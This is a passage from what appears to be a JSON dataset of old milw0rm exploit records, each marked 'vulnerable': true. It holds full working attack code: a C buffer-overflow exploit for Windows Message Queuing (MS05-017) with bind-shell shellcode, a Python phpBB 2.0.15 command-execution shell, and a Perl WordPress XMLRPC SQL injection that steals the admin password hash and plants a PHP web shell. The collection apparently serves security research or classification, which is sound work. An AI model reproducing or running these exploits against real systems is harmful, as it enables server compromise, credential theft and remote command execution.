short\tnum_trn_items;\n\n\t/* unsigned char\t*interface_uuid; */\n\n\t/* unsigned short\tinterface_ver; */\n\n\t/* unsigned short\tinterface_ver_min; */\n\n\t/* unsigned char\t*uuid; */\n\n\t/* unsigned long\tsyntax_ver; */\n\n} DCE_RPC_BIND, *PDCE_RPC_BIND;\n\n\n\n\n\n\n\nunsigned char dce_rpc_header1[] =\n\n\t\"\\x05\\x00\\x00\\x01\\x10\\x00\\x00\\x00\\x18\\x04\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\t\"\\x00\\x04\\x00\\x00\\x00\\x00\\x09\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"\n\n\t\"\\x01\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x02\\x00\\x00\\x00\"\n\n\t\"\\xE4\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\xE4\\x07\\x00\\x00\"\n\n\t\"\\x4F\\x00\\x53\\x00\\x3A\\x00\";\n\n\t/* ... Remote NetBIOS name */\n\n\n\nunsigned char tag_private[] =\n\n\t/* \\PRIVATE$\\ */\n\n\t\"\\x5C\\x00\"\n\n\t\"\\x50\\x00\\x52\\x00\\x49\\x00\\x56\\x00\\x41\\x00\\x54\\x00\\x45\\x00\\x24\\x00\"\n\n\t\"\\x5C\\x00\";\n\n\n\nunsigned char dce_rpc_header2[] =\n\n\t\"\\x05\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x18\\x04\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\t\"\\x00\\x04\\x00\\x00\\x00\\x00\\x09\\x00\";\n\n\n\nunsigned char dce_rpc_header3[] =\n\n\t\"\\x05\\x00\\x00\\x02\\x10\\x00\\x00\\x00\\x04\\x04\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\t\"\\xEC\\x03\\x00\\x00\\x00\\x00\\x09\\x00\";\n\n\n\n\n\nunsigned char offsets[] =\n\n\t/* entry point (jmp over) */\n\n\t\"\\xEB\\x08\\x90\\x90\"\n\n\t/* for Windows 2000 */\n\n\t/* mqsvc.exe - pop reg; pop reg; retn; */\n\n\t\"\\xE9\\x14\\x40\\x00\"\n\n\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\n\n\t/* entry point (jmp over) */\n\n\t\"\\xEB\\x08\\x90\\x90\"\n\n\t/* for Windows 2000 Server/AdvServer */\n\n\t/* mqsvc.exe - pop reg; pop reg; retn; */\n\n\t\"\\xE9\\x14\\x40\\x00\"\n\n\t\"\\x90\\x90\\xEB\\x1A\\x41\\x40\\x68\\x6F\\x75\\x73\\x65\\x6F\\x66\\x64\\x61\\x62\"\n\n\t\"\\x75\\x73\\x48\\x41\"\n\n\t/* entry point (jmp over) */\n\n\t\"\\xEB\\x06\\x90\\x90\"\n\n\t/* for Windows XP */\n\n\t/* mqsvc.exe - pop reg; pop reg; retn; */\n\n\t\"\\x4d\\x12\\x00\\x01\"\n\n\t\"\\x90\\x90\\x90\\x90\\x90\\x90\";\n\n\n\n\n\nunsigned char bind_shellcode[] =\n\n\t\"\\x29\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x19\"\n\n\t\"\\xf5\\x04\\x37\\x83\\xeb\\xfc\\xe2\\xf4\\xe5\\x9f\\xef\\x7a\\xf1\\x0c\\xfb\\xc8\"\n\n\t\"\\xe6\\x95\\x8f\\x5b\\x3d\\xd1\\x8f\\x72\\x25\\x7e\\x78\\x32\\x61\\xf4\\xeb\\xbc\"\n\n\t\"\\x56\\xed\\x8f\\x68\\x39\\xf4\\xef\\x7e\\x92\\xc1\\x8f\\x36\\xf7\\xc4\\xc4\\xae\"\n\n\t\"\\xb5\\x71\\xc4\\x43\\x1e\\x34\\xce\\x3a\\x18\\x37\\xef\\xc3\\x22\\xa1\\x20\\x1f\"\n\n\t\"\\x6c\\x10\\x8f\\x68\\x3d\\xf4\\xef\\x51\\x92\\xf9\\x4f\\xbc\\x46\\xe9\\x05\\xdc\"\n\n\t\"\\x1a\\xd9\\x8f\\xbe\\x75\\xd1\\x18\\x56\\xda\\xc4\\xdf\\x53\\x92\\xb6\\x34\\xbc\"\n\n\t\"\\x59\\xf9\\x8f\\x47\\x05\\x58\\x8f\\x77\\x11\\xab\\x6c\\xb9\\x57\\xfb\\xe8\\x67\"\n\n\t\"\\xe6\\x23\\x62\\x64\\x7f\\x9d\\x37\\x05\\x71\\x82\\x77\\x05\\x46\\xa1\\xfb\\xe7\"\n\n\t\"\\x71\\x3e\\xe9\\xcb\\x22\\xa5\\xfb\\xe1\\x46\\x7c\\xe1\\x51\\x98\\x18\\x0c\\x35\"\n\n\t\"\\x4c\\x9f\\x06\\xc8\\xc9\\x9d\\xdd\\x3e\\xec\\x58\\x53\\xc8\\xcf\\xa6\\x57\\x64\"\n\n\t\"\\x4a\\xa6\\x47\\x64\\x5a\\xa6\\xfb\\xe7\\x7f\\x9d\\x1a\\x55\\x7f\\xa6\\x8d\\xd6\"\n\n\t\"\\x8c\\x9d\\xa0\\x2d\\x69\\x32\\x53\\xc8\\xcf\\x9f\\x14\\x66\\x4c\\x0a\\xd4\\x5f\"\n\n\t\"\\xbd\\x58\\x2a\\xde\\x4e\\x0a\\xd2\\x64\\x4c\\x0a\\xd4\\x5f\\xfc\\xbc\\x82\\x7e\"\n\n\t\"\\x4e\\x0a\\xd2\\x67\\x4d\\xa1\\x51\\xc8\\xc9\\x66\\x6c\\xd0\\x60\\x33\\x7d\\x60\"\n\n\t\"\\xe6\\x23\\x51\\xc8\\xc9\\x93\\x6e\\x53\\x7f\\x9d\\x67\\x5a\\x90\\x10\\x6e\\x67\"\n\n\t\"\\x40\\xdc\\xc8\\xbe\\xfe\\x9f\\x40\\xbe\\xfb\\xc4\\xc4\\xc4\\xb3\\x0b\\x46\\x1a\"\n\n\t\"\\xe7\\xb7\\x28\\xa4\\x94\\x8f\\x3c\\x9c\\xb2\\x5e\\x6c\\x45\\xe7\\x46\\x12\\xc8\"\n\n\t\"\\x6c\\xb1\\xfb\\xe1\\x42\\xa2\\x56\\x66\\x48\\xa4\\x6e\\x36\\x48\\xa4\\x51\\x66\"\n\n\t\"\\xe6\\x25\\x6c\\x9a\\xc0\\xf0\\xca\\x64\\xe6\\x23\\x6e\\xc8\\xe6\\xc2\\xfb\\xe7\"\n\n\t\"\\x92\\xa2\\xf8\\xb4\\xdd\\x91\\xfb\\xe1\\x4b\\x0a\\xd4\\x5f\\xf6\\x3b\\xe4\\x57\"\n\n\t\"\\x4a\\x0a\\xd2\\xc8\\xc9\\xf5\\x04\\x37\";\n\n\n\n#define SET_PORTBIND_PORT(buf, port) \\\n\n\t*(unsigned short *)(((buf)+186)) = (port)\n\n\n\n\n\nint\n\nhex2raw(unsigned char *s, unsigned char *out)\n\n{\n\n\tunsigned long i, len, j = 0;\n\n\tunsigned long ret = 0;\n\n\n\n\tlen = strlen(s);\n\n\tfor (i = 0; i < len; i+=2) {\n\n\t\tif ((s[i] >= 0x30) && (s[i] <= 0x39))\n\n\t\t\tj = s[i] - 0x30;\n\n\t\telse\n\n\t\t\tj = s[i] - 0x61 + 10;\n\n\t\tj *= 16;\n\n\t\tif ((s[i+1] >= 0x30) && (s[i+1] <= 0x39))\n\n\t\t\tj += s[i+1] - 0x30;\n\n\t\telse\n\n\t\t\tj += s[i+1] - 0x61 + 10;\n\n\t\tout[ret] = (unsigned char)j;\n\n\t\tret++;\n\n\t}\n\n\n\nreturn ret;\n\n}\n\n\n\nvoid\n\ninverse(unsigned char *io, unsigned long len)\n\n{\n\n\tunsigned long i;\n\n\tunsigned char c;\n\n\n\n\tfor (i = 0; i < len/2; i++) {\n\n\t\tc = io[len-i-1];\n\n\t\tio[len-i-1] = io[i];\n\n\t\tio[i] = c;\n\n\t}\n\n}\n\n\n\n\n\nint\n\nencode_uuid(unsigned char *uuid, unsigned char *out)\n\n{\n\n\tunsigned long i, len, ret;\n\n\tunsigned cnt = 0, ar = 0;\n\n\tunsigned char *ptr;\n\n\n\n\tptr = uuid;\n\n\tlen = strlen(uuid);\n\n\tfor (i = 0; i < len; i++) {\n\n\t\tif (uuid[i] == '-') {\n\n\t\t\tuuid[i] = '\\0';\n\n\t\t\tif (ar < 3) {\n\n\t\t\t\tret = hex2raw(ptr, out);\n\n\t\t\t\tinverse(out, ret);\n\n\t\t\t\tout += ret; cnt += ret;\n\n\t\t\t}\n\n\t\t\telse {\n\n\t\t\t\tret = hex2raw(ptr, out);\n\n\t\t\t\tout += ret; cnt += ret;\n\n\t\t\t}\n\n\t\t\tptr = uuid+i+1;\n\n\t\t\tar++;\n\n\t\t}\n\n\t}\n\n\tout[len] = '\\0';\n\n\n\n\tret = hex2raw(ptr, out);\n\n\tout += ret; cnt += ret;\n\n\n\nreturn cnt;\n\n}\n\n\n\nunsigned char *\n\ndce_rpc_bind(\n\n\tunsigned long cid,\n\n\tunsigned char *uuid,\n\n\tunsigned short ver,\n\n\tunsigned long *pkt_len)\n\n{\n\n\tunsigned char vuid[] = \"8a885d04-1ceb-11c9-9fe8-08002b104860\";\n\n\tunsigned char *pkt, *euuid, *tmp;\n\n\tunsigned long cnt;\n\n\tunsigned short ret;\n\n\tPDCE_RPC_BIND rpc_bind;\n\n\tPDCE_RPC rpc;\n\n\n\n\tpkt = (unsigned char *)calloc(2048, 1);\n\n\teuuid = (unsigned char *)calloc(strlen(uuid)/2+2, 1);\n\n\n\n\ttmp = pkt;\n\n\tpkt += sizeof(DCE_RPC);\n\n\trpc_bind = (PDCE_RPC_BIND)pkt;\n\n\trpc_bind->max_xmit\t= 0x16D0;\n\n\trpc_bind->max_recv\t= 0x16D0;\n\n\trpc_bind->asc_group\t= 0;\n\n\trpc_bind->num_con_items\t= 1;\n\n\trpc_bind->con_id\t= 0;\n\n\trpc_bind->num_trn_items\t= 1;\n\n\n\n\tpkt += sizeof(DCE_RPC_BIND);\n\n\n\n\tcnt = encode_uuid(uuid, pkt);\n\n\tpkt += cnt;\n\n\tmemcpy(pkt, &ver, sizeof(short));\n\n\tpkt += sizeof(short);\n\n\t*pkt++ = 0; *pkt++ = 0;\n\n\tcnt = encode_uuid(vuid, pkt);\n\n\tpkt += cnt;\n\n\t*pkt++ = 2; *pkt++ = 0;\n\n\n\n\tret = pkt - tmp;\n\n\trpc = (PDCE_RPC)tmp;\n\n\trpc->ver\t= 5;\n\n\trpc->ver_minor\t= 0;\n\n\trpc->pkt_type\t= _DCE_RPC_BIND;\n\n\trpc->pkt_flags\t= 3;\n\n\trpc->data_repres = 16;\n\n\trpc->frag_len\t= ret + 2;\n\n\trpc->auth_len\t= 0;\n\n\trpc->caller_id\t= cid;\n\n\n\n\t*pkt_len = ret + 2;\n\n\tfree(euuid);\n\n\n\nreturn tmp;\n\n}\n\n\n\nvoid\n\nconvert_name(char *out, char *name)\n\n{\n\n\tunsigned long len;\n\n\n\n\tlen = strlen(name);\n\n\tout += len * 2 - 1;\n\n\twhile (len--) {\n\n\t\t*out-- = '\\x00';\n\n\t\t*out-- = name[len];\n\n\t}\n\n}\n\n\n\n\n\n\n\nint\n\nmain (int argc, char **argv)\n\n{\n\n\n\n\tunsigned char endp[] = \"fdb3a030-065f-11d1-bb9b-00a024ea5525\";\n\n\tunsigned char *packet = NULL;\n\n\tunsigned short bindport;\n\n\tunsigned long cnt;\n\n\tstruct sockaddr_in addr;\n\n\tstruct hostent *he;\n\n\tint len, cpkt = 1;\n\n\tint sockfd;\n\n\tchar recvbuf[4096];\n\n\tchar *buff, *ptr;\n\n#ifdef _WIN32  \n\n\tWSADATA wsa;  \n\n#endif  \n\n\n\n\n\n\tprintf(\"\\n      (MS05-017) Message Queuing Buffer Overflow Vulnerability\\n\\n\");\n\n\tprintf(\"\\t     Copyright (c) 2004-2005 .: houseofdabus :.\\n\\n\\n\");\n\n\n\n\n\n\tif (argc < 5) {\n\n\t\tprintf(\"%s <host> <port> <netbios name> <bind port> [count]\\n\", argv[0]);\n\n\t\tprintf(\"\\nMSMQ ports: 2103, 2105, 2107\\n\");\n\n\t\tprintf(\"count - number of packets. for Win2k Server/AdvServer = 6-8\\n\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n#ifdef _WIN32  \n\n\tWSAStartup(MAKEWORD(2,0), &wsa);  \n\n#endif  \n\n\n\n\tif ((he = gethostbyname(argv[1])) == NULL) {\n\n\t\tprintf(\"[-] Unable to resolve %s\\n\", argv[1]);\n\n\t\treturn 0;\n\n\t}\n\n\n\n\tif ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {\n\n\t\tprintf(\"[-] create socket failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\taddr.sin_family = AF_INET;\n\n\taddr.sin_port = htons((short)atoi(argv[2]));\n\n\taddr.sin_addr = *((struct in_addr *)he->h_addr);  \n\n\tmemset(&(addr.sin_zero), '\\0', 8);\n\n\n\n\tprintf(\"\\n[*] Connecting to %s:%u ... \", argv[1], atoi(argv[2]));\n\n\tif (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {\n\n\t\tprintf(\"\\n[-] connect failed!\\n\");\n\n\t\texit(0);\n\n\t}\n\n\tprintf(\"OK\\n\");\n\n\n\n\tpacket = dce_rpc_bind(0, endp, 1, &cnt);\n\n\n\n\tif (send(sockfd, packet, cnt, 0) == -1) {\n\n\t\tprintf(\"[-] send failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tlen = recv(sockfd, recvbuf, 4096, 0);\n\n\tif (len <= 0) {\n\n\t\tprintf(\"[-] recv failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\tfree(packet);\n\n\n\n\tprintf(\"[*] Attacking...\");\n\n\n\n\tbuff = (char *) malloc(4172);\n\n\tmemset(buff, NOP, 4172);\n\n\n\n\tptr = buff;\n\n\tmemcpy(ptr, dce_rpc_header1, sizeof(dce_rpc_header1)-1);\n\n\tptr += sizeof(dce_rpc_header1)-1;\n\n\n\n\t// Remote NetBIOS name\n\n\tconvert_name(ptr, argv[3]);\n\n\tptr += strlen(argv[3])*2;\n\n\n\n\tmemcpy(ptr, tag_private, sizeof(tag_private)-1);\n\n\tptr += sizeof(tag_private)-1;\n\n\n\n\tmemcpy(buff+1048,   dce_rpc_header2, sizeof(dce_rpc_header2)-1);\n\n\tmemcpy(buff+1048*2, dce_rpc_header2, sizeof(dce_rpc_header2)-1);\n\n\tmemcpy(buff+1048*3, dce_rpc_header3, sizeof(dce_rpc_header3)-1);\n\n\n\n\t// offsets\n\n\tptr = buff;\n\n\tptr += 438;\n\n\tmemcpy(ptr, offsets, sizeof(offsets)-1);\n\n\tptr += sizeof(offsets)-1;\n\n\n\n\t// shellcode\n\n\tbindport = (unsigned short)atoi(argv[4]);\n\n\tbindport ^= 0x0437;\n\n\tSET_PORTBIND_PORT(bind_shellcode, htons(bindport));\n\n\tmemcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);\n\n\n\n\tbuff[4170] = '\\0';\n\n\tbuff[4171] = '\\0';\n\n\n\n\tif (argc == 6) cpkt = atoi(argv[5]);\n\n\n\n\twhile (cpkt--) {\n\n\t\tprintf(\".\");\n\n\t\tif (send(sockfd, buff, 4172, 0) == -1) {\n\n\t\t\tprintf(\"\\n[-] send failed\\n\");\n\n\t\t\texit(0);\n\n\t\t}\n\n\t}\n\n\tprintf(\" OK\\n\");\n\n\n\n\n\nreturn 0;\n\n}\n\n\n\n// milw0rm.com [2005-06-29]",
415        "vulnerable": true
416    },
417    {
418        "exploit_id": 1076,
419        "content": "# tested and working /str0ke\n\n\n\n#!/usr/bin/pyth0n\n\n#\n\n###############################################################  this exploit for\n\n                                                              #  phpBB 2.0.15 \n\nprint \"\\nphpBB 2.0.15 arbitrary command execution eXploit\"    #  emulates a shell,\n\nprint \" 2005 by rattle@awarenetwork.org\"                      #  rather than \n\nprint \" well, just because there is none.\"                    #  sending a single\n\n                                                              #  command.\n\nimport sys                                                 ####\n\nfrom urllib2 import Request, urlopen\n\nfrom urlparse import urlparse, urlunparse\n\nfrom urllib import quote as quote_plus\n\n\n\nINITTAG = '<g0>'\n\nENDTAG  = '</g0>'\n\n\n\ndef makecmd(cmd):\n\n    return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd[1:],'chr(%d)'%ord(cmd[0]))\n\n\n\n\n\n_ex  = \"%sviewtopic.php?t=%s&highlight=%%27.\"\n\n_ex += \"printf(\" + makecmd(INITTAG) + \").system(%s).\"\n\n_ex += \"printf(\" + makecmd(ENDTAG) + \").%%27\"\n\n\n\n\n\ndef usage():\n\n    print \"\"\"Usage: %s <forum> <topic>\n\n \n\n    forum - fully qualified url to the forum\n\n            example: http://www.host.com/phpBB/\n\n\n\n    topic - ID of an existing topic. Well you \n\n            will have to check yourself.\n\n\n\n\"\"\"[:-1] % sys.argv[0]; sys.exit(1)\n\n\n\n\n\nif __name__ == '__main__':\n\n\n\n    if len(sys.argv) < 3 or not sys.argv[2].isdigit():\n\n        usage()\n\n    else:\n\n        print\n\n        url = sys.argv[1]\n\n        if url.count(\"://\") == 0: \n\n            url = \"http://\" + url\n\n        url = list(urlparse(url))\n\n        host = url[1]\n\n        if not host: usage()\n\n\n\n        if not url[0]: url[0] = 'http'\n\n        if not url[2]: url[2] = '/'\n\n        url[3] = url[4] = url[5] = ''\n\n\n\n        url = urlunparse(url)\n\n\tif url[-1] != '/': url += '/'\n\n\n\n        topic = quote_plus((sys.argv[2]))\n\n\n\n        while 1:\n\n\n\n            try:\n\n                cmd = raw_input(\"[%s]$ \" % host).strip()\n\n                if cmd[-1]==';': cmd=cmd[:-1]\n\n\n\n                if (cmd == \"exit\"): break\n\n                else: cmd = makecmd(cmd)\n\n\t\t\n\n\t\tout = _ex % (url,topic,cmd)\n\n\n\n                try: ret = urlopen(Request(out)).read()\n\n                except KeyboardInterrupt: continue\n\n                except: pass\n\n\n\n                else:\n\n                    ret = ret.split(INITTAG,1)\n\n                    if len(ret)>1: ret = ret[1].split(ENDTAG,1)\n\n                    if len(ret)>1:\n\n                        ret = ret[0].strip();\n\n                        if ret: print ret\n\n                        continue;\n\n\n\n                print \"EXPLOIT FAILED\"\n\n\n\n            except:\n\n                continue\n\n\n\n# milw0rm.com [2005-06-29]",
420        "vulnerable": true
421    },
422    {
423        "exploit_id": 1077,
424        "content": "#!/usr/bin/perl -w\n\n\n\n# sorry for the late posting, had to test it. /str0ke\n\n\n\n#################################################################\n\n# Wordpress 1.5.1.2 Strayhorn // XMLRPC Interface SQL Injection #\n\n#################################################################\n\n# By James Bercegay // http://www.gulftech.org/ // June 21 2005 #\n\n#################################################################\n\n# Quick and dirty proof of concept that uses the XML RPC server #\n\n# vulnerabilities I discovered to extract a password hash & use #\n\n# that hash to execute shell commands on the server as httpd :) #\n\n#################################################################\n\n# Technical details of WordPress XMLRPC Interface SQL Injection #\n\n#################################################################\n\n# The vulnerability exist because all XMLRPC data is taken from #\n\n# the HTTP_RAW_POST_DATA variable, and never sanatized properly #\n\n# thus leaving the doors open for attack. Also, most if not all #\n\n# the functions in xmlrpc.php are vulnerable to similar attacks #\n\n#################################################################\n\n#\n\n# C:\\Documents and Settings\\James\\Desktop>wp.pl http://pathto/wp admin 1 \"id;uname -a;pwd;uptime\"\n\n# [*] Trying Host http://pathto/wp ...\n\n# [+] The XMLRPC server seems to be working\n\n# [+] Char 1 is 2\n\n# [+] Char 2 is 1\n\n# [+] Char 3 is 2\n\n# [+] Char 4 is 3\n\n# [+] Char 5 is 2\n\n# [+] Char 6 is f\n\n# [+] Char 7 is 2\n\n# [+] Char 8 is 9\n\n# [+] Char 9 is 7\n\n# [+] Char 10 is a\n\n# [+] Char 11 is 5\n\n# [+] Char 12 is 7\n\n# [+] Char 13 is a\n\n# [+] Char 14 is 5\n\n# [+] Char 15 is a\n\n# [+] Char 16 is 7\n\n# [+] Char 17 is 4\n\n# [+] Char 18 is 3\n\n# [+] Char 19 is 8\n\n# [+] Char 20 is 9\n\n# [+] Char 21 is 4\n\n# [+] Char 22 is a\n\n# [+] Char 23 is 0\n\n# [+] Char 24 is e\n\n# [+] Char 25 is 4\n\n# [+] Char 26 is a\n\n# [+] Char 27 is 8\n\n# [+] Char 28 is 0\n\n# [+] Char 29 is 1\n\n# [+] Char 30 is f\n\n# [+] Char 31 is c\n\n# [+] Char 32 is 3\n\n# [+] Host : http://pathto/wp\n\n# [+] User : admin\n\n# [+] Hash : 21232f297a57a5a743894a0e4a801fc3\n\n# [*] Attempting to create shell ..\n\n# [+] Trying filename hello.php ...\n\n# [+] Trying to activate hello.php ...\n\n# [+] Trying to execute id;uname -a;pwd;uptime ...\n\n# [+] Successfully executed id;uname -a;pwd;uptime\n\n#\n\n# uid=1979(gulftech) gid=500(customer) groups=500(customer)\n\n# FreeBSD example.com 4.10-RELEASE FreeBSD 4.10-RELEASE #0: Tue Jan 1\n\n# 1 22:44:03 PST 2005     james@example.com:/usr/src/sys/compile/EXAMPLE  i386\n\n#\n\n# /www/htdocs/wp/wp-admin\n\n# 8:07AM  up 35 days, 20:01, 1 user, load averages: 7.98, 8.24, 8.14\n\n#\n\n#################################################################\n\n\n\nuse LWP::UserAgent;\n\nuse Digest::MD5 qw(md5_hex);\n\n\n\nmy $ua = new LWP::UserAgent;\n\n  $ua->agent(\"Wordpress Hash Grabber v1.0\" . $ua->agent);\n\n\n\nmy @char = (\"0\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"a\",\"b\",\"c\",\"d\",\"e\",\"f\");\n\n\n\nmy $host = $ARGV[0]; # The path to xmlrpc.php\n\nmy $user = $ARGV[1]; # The target login, default wp user is admin\n\nmy $post = $ARGV[2]; # Must be a valid pingback or part\n\n                                    # of an entry title, very easy to\n\n                                        # obtain if you know how to read :)\n\nmy $exec = $ARGV[3]; # Command to execute\n\nmy $pref = 'wp_';    # database prefix!\n\nmy $hash = '';\n\n\n\nif ( !$ARGV[2] )\n\n{\n\n       die(\"Im Not Psychic ..\\n\");\n\n}\n\n\n\nprint \"[*] Trying Host $host ...\\n\";\n\n\n\nmy $res = $ua->get($host.'/xmlrpc.php');\n\n\n\nif ( $res->content =~ /XML-RPC server accepts POST requests only/is )\n\n{\n\n       print \"[+] The XMLRPC server seems to be working \\n\";\n\n}\n\nelse\n\n{\n\n       print \"[!] Something seems to be wrong with the XMLRPC server \\n \";\n\n       # Sloppy way of debugging, remove if you want\n\n       open(LOG, \">wp_out.html\"); print LOG $res->content;\n\n       exit;\n\n}\n\n\n\nfor( $i=1; $i < 33; $i++ )\n\n{\n\n       for( $j=0; $j < 16; $j++ )\n\n       {\n\n                               # oh my! :)\n\n                               my $sql = \"<?xml version=\\\"1.0\\\"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>foobar' UNION SELECT 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 FROM \" . $pref . \"users WHERE (user_login='$user' AND MID(user_pass,$i,1)='$char[$j]')/*</string></value></param><param><value><string>$host/?p=$post#$post</string></value></param><param><value><string>admin</string></value></param></params></methodCall>\";\n\n\n\n                               # Remove the content type so $HTTP_RAW_POST_DATA is\n\n                               # populated. php.net guys, pleeeeaaase fix this! :)\n\n                               my $req = new HTTP::Request POST => $host . \"/xmlrpc.php\";\n\n                                  $req->content($sql);\n\n                                  $res = $ua->request($req);\n\n                              $out = $res->content;\n\n\n\n               if ( $out =~ /The pingback has already been registered/)\n\n               {\n\n                   $hash .= $char[$j];\n\n                   print \"[+] Char $i is $char[$j]\\n\";\n\n                   last;\n\n               }\n\n\n\n       }\n\n\n\n   if ( length($hash) < 1 )\n\n   {\n\n               # Sloppy way of debugging, remove if you want\n\n               open(LOG, \">wp_out.html\"); print LOG $out;\n\n\n\n               print \"[!] $host not vulnerable? Better verify manually!\\n\";\n\n               exit;\n\n       }\n\n                               if ( $out =~ /<value><int>0<\\/int><\\/value>/)\n\n                               {\n\n                                   print \"[!] Invalid post information specified! \\n\";\n\n                                       exit;\n\n                               }\n\n\n\n                               # Probably exploitable, but not by using default SQL query. The\n\n                               # [0]{5} regex may be a bad idea bit ive never seen a md5 thats\n\n                               # got 5 0's at the very beginning of it.\n\n                               if ( $out =~ /different number of columns/is || $hash =~ /([0]{5})/ )\n\n                               {\n\n                                       # Sloppy way of debugging, remove if you want\n\n                                       open(LOG, \">wp_out.html\"); print LOG $out;\n\n\n\n                                       print \"[!] The database structured has been altered, check manually \\n\";\n\n                                       exit;\n\n                               }\n\n\n\n}\n\n\n\n# Verbose\n\nprint \"[+] Host : $host\\n\";\n\nprint \"[+] User : $user\\n\";\n\nprint \"[+] Hash : $hash\\n\";\n\n\n\n# We got the hash, so we are guaranteed admin\n\n# even if we can not successfully execute! :)\n\nprint \"[*] Attempting to create shell .. \\n\";\n\n\n\n# Here we md5 the passhash, as well as the host\n\n# in order to get the cookie hash, and the pass\n\n# hash values respectively.\n\nmy $ckey = md5_hex($host);\n\n  $hash = md5_hex($hash);\n\n\n\n# Create the cookie used to make all admin requests\n\nmy @cookie = ('Referer' => $host.'/wp-admin/plugins.php;','Cookie' => 'wordpressuser_'.$ckey.'='.$user.'; wordpresspass_'.$ckey.'='. $hash);\n\n  $res = $ua->get($host.'/wp-admin/plugin-editor.php', @cookie);\n\n\n\n# Let's get the filename from the plugin editor\n\nif ( $res->content =~ /<strong>(.*)\\.php<\\/strong>/i )\n\n{\n\n       # Seems our request went okay, and we have the filename!\n\n       my @list = ($1.'.php', 'hello.php', 'markdown.php', 'textile1.php');\n\n       my $file;\n\n\n\n       # Make it work one way or another :)\n\n       foreach $file (@list)\n\n       {\n\n\n\n               print \"[+] Trying filename $file ...\\n\";\n\n               $res = $ua->get($host.'/wp-admin/plugin-editor.php?file='.$file, @cookie);\n\n\n\n               if ( $res->content =~ /<textarea[^>]*>(.*)<\\/textarea>/is )\n\n               {\n\n                       # This is the file contents\n\n                       my $data = $1;\n\n\n\n                          # Quick and dirty way to fix the data recieved\n\n                          # so that it executes and does not cause error\n\n                          $data =~ s/>/>/ig;\n\n                          $data =~ s/</</ig;\n\n                          $data =~ s/\"/\"/ig;\n\n                          $data =~ s/&/&/ig;\n\n\n\n\n\n\n\n                       # We use the <cmdout> tag to make it easy to grab out command output\n\n                       my $add = ( $data =~ /<cmdout>(.*)<\\/cmdout>/is ) ? '': '<cmdout><?php if ( !empty($_REQUEST[\"cmd\"]) ) passthru($_REQUEST[\"cmd\"]); ?></cmdout>';\n\n\n\n                          # Adding our php code to the selected plugin\n\n                          $res = $ua->post($host . \"/wp-admin/plugin-editor.php\", ['newcontent' => $add.$data, 'action' => 'update', 'file' => $file, 'submit' => 'foobar'], @cookie);\n\n\n\n                          # Trying to activate the plugin. If the requests doesn't succeed\n\n                          # then the command execution will fail unless the plugin has had\n\n                          print \"[+] Trying to activate $file ... \\n\";\n\n                          $res = $ua->get($host.'/wp-admin/plugins.php?action=activate&plugin='.$file , @cookie);\n\n\n\n                          # Depending on the plugin this should execute\n\n                          # our command, else we try the file directly!\n\n                          # this works everytime on the default install\n\n                          print \"[+] Trying to execute $exec ... \\n\";\n\n                      $res = $ua->get($host.'/wp-admin/plugins.php?cmd='.$exec, @cookie);\n\n\n\n                          # It seems we have executed our command successfully\n\n                          if ( $res->content =~ /<cmdout>(.*)<\\/cmdout>/is )\n\n                          {\n\n                                  # Send results to STDOUT\n\n                              print \"[+] Successfully executed $exec\\n\\n\\n\";\n\n                                  print $1;\n\n                                  exit;\n\n                          }\n\n                          else\n\n                          {\n\n                                  # No luck with that particular method, so\n\n                                  # we will try to access the modified file\n\n                                  print \"[!] Couldnt execute command $exec\\n\";\n\n                                  open(LOG, \">wp_out.html\"); print LOG $res->content;\n\n\n\n                                  # Trying to access the file directly and execute\n\n                                  print \"[!] Trying to access $file directly!\\n\";\n\n                                  $res = $ua->get($host.'/wp-content/plugins/'.$file.'?cmd='.$exec, @cookie);\n\n\n\n                                   # It seems we have executed our command successfully\n\n                                  if ( $res->content =~ /<cmdout>(.*)<\\/cmdout>/is )\n\n                                  {\n\n                                          # Send results to STDOUT\n\n                                  print \"[+] Successfully executed $exec\\n\\n\\n\";\n\n                                      print $1;\n\n                                          exit;\n\n                                  }\n\n                                  else\n\n                                  {\n\n                                          # No luck, better take a look at things manually\n\n                                      print \"[!] Couldnt execute command $exec\\n\";\n\n                                          print \"[*] Try $host/wp-content/plugins/$file manually\\n\";\n\n                                  }\n\n                          }\n\n               }\n\n               else\n\n               {\n\n                       # Unable to get the file contents\n\n                       print \"[!] Could not read file $file \\n\";\n\n                       open(LOG, \">wp_out.html\"); print LOG $res->content . $file;\n\n               }\n\n\n\n       }\n\n\n\n}\n\nelse\n\n{\n\n       # Unable to get the plugin information\n\n       print \"[!] Could Not Get Plugin Information\\n\";\n\n       open(LOG, \">wp_out.html\"); print LOG $res->content;\n\n}\n\n\n\n# fin\n\nexit;\n\n\n\n# milw0rm.com [2005-06-30]",
425        "vulnerable": true
426    },
427    {
428        "exploit_id": 1078,
